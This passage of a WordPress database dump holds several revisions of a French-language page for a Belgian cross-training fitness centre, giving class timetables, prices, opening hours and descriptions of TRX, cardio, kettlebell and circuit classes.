: 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:49:28', '2013-07-03 17:49:28', '', 11, 'http://www.crosstrainingcenter.be/?p=199', 0, 'revision', '', 0),
(200, 1, '2013-07-03 17:51:17', '2013-07-03 17:51:17', '<h2>Team Training :</h2>\r\nLes séances sont programmées selon le planning ci-dessous.\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 45%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\">toto\r\ntiti\r\ntoutou</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:51:17', '2013-07-03 17:51:17', '', 11, 'http://www.crosstrainingcenter.be/?p=200', 0, 'revision', '', 0),
(201, 1, '2013-07-03 17:51:52', '2013-07-03 17:51:52', '<h2>Team Training :</h2>\r\nLes séances sont programmées selon le planning ci-dessous.\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<br><br>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 98%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\">toto\r\ntiti\r\ntoutou</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:51:52', '2013-07-03 17:51:52', '', 11, 'http://www.crosstrainingcenter.be/?p=201', 0, 'revision', '', 0),
(202, 1, '2013-07-03 17:53:40', '2013-07-03 17:53:40', '<h2>Team Training :</h2>\r\nLes séances sont programmées selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 98%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\">toto\r\ntiti\r\ntoutou</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 